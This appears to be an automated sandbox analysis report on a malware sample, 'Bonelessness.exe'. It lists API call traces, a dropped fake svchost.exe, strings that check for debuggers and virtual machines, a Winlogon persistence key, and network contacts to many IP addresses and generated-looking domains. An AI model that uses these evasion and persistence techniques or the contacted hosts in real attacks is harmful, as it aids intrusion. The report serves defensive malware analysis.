Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028A7430 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,	5_2_028A7430
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_02457430 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,	6_2_02457430
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012F7430 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,	8_2_012F7430

Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

Source: C:\Windows\apppatch\svchost.exe	API coverage: 6.8 %
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	API coverage: 2.5 %
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	API coverage: 2.5 %
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	API coverage: 2.5 %

Source: C:\Windows\apppatch\svchost.exe TID: 3748	Thread sleep count: 4279 > 30	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 3748	Thread sleep time: -427900s >= -30000s	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 3748	Thread sleep count: 5581 > 30	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 3748	Thread sleep time: -558100s >= -30000s	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe TID: 6744	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior

Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D3E1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	1_2_02D3E1B0
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D4D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,	1_2_02D4D638
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D49460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	1_2_02D49460
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D3CC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,IsUserAnAdmin,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	1_2_02D3CC10
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D27400 PathFileExistsA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	1_2_02D27400
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_02D4D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,	1_2_02D4D5A0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028AE1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	5_2_028AE1B0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028BD638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,	5_2_028BD638
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_02897400 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	5_2_02897400
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028ACC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	5_2_028ACC10
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028B9460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	5_2_028B9460
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_028BD5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,	5_2_028BD5A0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0245E1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	6_2_0245E1B0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0246D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,	6_2_0246D638
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_02469460 PathFileExistsA,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	6_2_02469460
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_02447400 GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	6_2_02447400
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0245CC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	6_2_0245CC10
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_0246D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,	6_2_0246D5A0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_00E16B1C FindFirstFileExW,	8_2_00E16B1C
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012FE1B0 memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	8_2_012FE1B0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_0130D5A0 memset,memset,SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,lstrlenW,WideCharToMultiByte,lstrlenW,memcpy,lstrlenW,WideCharToMultiByte,lstrlenW,WideCharToMultiByte,FindNextFileW,FindClose,	8_2_0130D5A0
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012E7400 PathAddBackslashA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,FindFirstFileA,GetProcessHeap,HeapAlloc,memset,lstrcpynA,PathAddBackslashA,SetFileAttributesA,SetFileAttributesA,SetFileAttributesA,DeleteFileA,MoveFileExA,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,FindNextFileA,FindClose,SetFileAttributesA,RemoveDirectoryA,	8_2_012E7400
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_012FCC10 StrStrIA,memset,memset,GetLogicalDriveStringsA,SetErrorMode,GetDriveTypeA,SetCurrentDirectoryA,FindFirstFileA,GetFileAttributesA,StrStrIA,StrStrIA,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,PathAddBackslashA,CreateDirectoryA,GetLastError,#680,PathMakeSystemFolderA,SetLastError,FindNextFileA,SetErrorMode,	8_2_012FCC10
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_01309460 Sleep,LocalAlloc,_snprintf,FindFirstFileA,LocalFree,wsprintfA,wsprintfA,wsprintfA,memset,lstrcpynA,FindNextFileA,FindClose,	8_2_01309460
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_0130D638 SHGetSpecialFolderPathA,strchr,MultiByteToWideChar,FindFirstFileW,	8_2_0130D638

Source: C:\Windows\apppatch\svchost.exe

1_2_02D3D060

Source: C:\Windows\apppatch\svchost.exe

Thread delayed: delay time: 922337203685477

Jump to behavior

Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: vname.key\secrets.keysign.keyjava.exekernel32.dllCreateFileW\explorer.exeGetFileAttributesWuser32.dllGetWindowTextAOLLYDBGwireshark.exedumpcap.exeidag.exevmwaretray.exe\\?\globalroot\systemroot\system32\vmx_fb.dllABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/
Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089771985.0000000002940000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: vmwaretray.exe
Source: svchost.exe, 00000001.00000002.2909940532.0000000000400000.00000040.00000001.01000000.00000005.sdmp	Binary or memory string: NOLLYDBGwireshark.exedumpcap.exeidag.exevmwaretray.exe\\?\globalroot\systemroot\system32\vmx_fb.dllSystemDrivesoftware\microsoft\windows nt\currentversion\winlogon%xsoftware\microsoft\windows\currentversion\runuserinit\\?\globalroot\systemroot\system32\drivers\ntfs.sysntdll.dllRtlUniformkernel32.dllIsWow64Processkernel.dlla
Source: svchost.exe, 00000001.00000002.2910453874.0000000000863000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: svchost.exe, 00000001.00000002.2911000726.00000000008B2000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWRSVP TCP Service Provider
Source: svchost.exe, 00000001.00000002.2910453874.0000000000850000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW(
Source: JbrLYfXaOpqnSngA.exe, 00000027.00000002.2089124359.0000000000E40000.00000040.00000001.00020000.00000000.sdmp	Binary or memory string: name.key\secrets.keysign.keyjava.exekernel32.dllCreateFileW\explorer.exeGetFileAttributesWuser32.dllGetWindowTextAOLLYDBGwireshark.exedumpcap.exeidag.exevmwaretray.exe\\?\globalroot\systemroot\system32\vmx_fb.dllABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/

Source: C:\Users\user\Desktop\Bonelessness.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Windows\apppatch\svchost.exe

Open window title or class name: ollydbg

Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\Bonelessness.exe

Code function: 0_2_00401DE0 rdtsc

0_2_00401DE0

Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe

Code function: 5_2_028A7430 OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,EnterCriticalSection,LeaveCriticalSection,VirtualQuery,LdrInitializeThunk,VirtualQuery,LdrInitializeThunk,VirtualQuery,EnterCriticalSection,GetProcessHeap,HeapAlloc,OpenProcess,GetProcessTimes,GetHandleInformation,CloseHandle,LeaveCriticalSection,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,Sleep,

5_2_028A7430

Source: C:\Users\user\Desktop\Bonelessness.exe

0_2_00401000

Source: C:\Windows\apppatch\svchost.exe

1_2_02D37300

Source: C:\Users\user\Desktop\Bonelessness.exe

Code function: 0_2_004020C0 memset,SHGetFolderPathA,PathAppendA,SetCurrentDirectoryA,LoadLibraryA,GetProcAddress,FreeLibrary,

0_2_004020C0

Source: C:\Users\user\Desktop\Bonelessness.exe	Code function: 0_2_00406800 mov eax, dword ptr fs:[00000030h]	0_2_00406800
Source: C:\Users\user\Desktop\Bonelessness.exe	Code function: 0_2_00406B60 mov edx, dword ptr fs:[00000030h]	0_2_00406B60
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_00406800 mov eax, dword ptr fs:[00000030h]	1_2_00406800
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_00406B60 mov edx, dword ptr fs:[00000030h]	1_2_00406B60
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_024C1360 mov edx, dword ptr fs:[00000030h]	1_2_024C1360
Source: C:\Windows\apppatch\svchost.exe	Code function: 1_2_024C1000 mov eax, dword ptr fs:[00000030h]	1_2_024C1000
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_00E41360 mov edx, dword ptr fs:[00000030h]	5_2_00E41360
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 5_2_00E41000 mov eax, dword ptr fs:[00000030h]	5_2_00E41000
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_00D51360 mov edx, dword ptr fs:[00000030h]	6_2_00D51360
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 6_2_00D51000 mov eax, dword ptr fs:[00000030h]	6_2_00D51000
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_01281360 mov edx, dword ptr fs:[00000030h]	8_2_01281360
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_01281000 mov eax, dword ptr fs:[00000030h]	8_2_01281000

Source: C:\Users\user\Desktop\Bonelessness.exe

Code function: 0_2_004028B0 IsUserAnAdmin,VirtualQuery,GetModuleFileNameA,PathFileExistsA,GetSystemWindowsDirectoryA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,_snprintf,CopyFileA,RtlImageNtHeader,GetProcessHeap,GetProcessHeap,HeapValidate,GetProcessHeap,HeapFree,MoveFileExA,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GlobalFindAtomA,ExitProcess,GlobalAddAtomA,

0_2_004028B0

Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_00E114C3 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	8_2_00E114C3
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_00E15CDB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00E15CDB
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_00E1194F IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	8_2_00E1194F
Source: C:\Program Files (x86)\MHEKOyhZyBLLlMxrnbbngMvDCoUsfGQJPyRpZzWR\JbrLYfXaOpqnSngA.exe	Code function: 8_2_00E11AE2 SetUnhandledExceptionFilter,	8_2_00E11AE2

HIPS / PFW / Operating System Protection Evasion

System process connects to network (likely due to code injection or exploit)

Source: C:\Windows\apppatch\svchost.exe	Network Connect: 64.190.63.136 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 3.94.10.34 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 15.197.240.20 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Domain query: lysynur.com
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 172.234.222.143 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 72.52.179.174 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 154.85.183.50 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 64.225.91.73 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 69.162.80.60 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 52.34.198.229 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 5.79.71.225 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Domain query: gaqypiz.com
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 199.191.50.83 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 13.248.169.48 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 106.15.137.66 8001	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 103.224.212.210 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Domain query: pufyjag.com
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 18.208.156.248 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 208.100.26.245 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Domain query: galyqoh.com
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 103.224.182.252 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 199.59.243.226 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 103.150.11.230 80	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Network Connect: 3.64.163.50 80	Jump to behavior
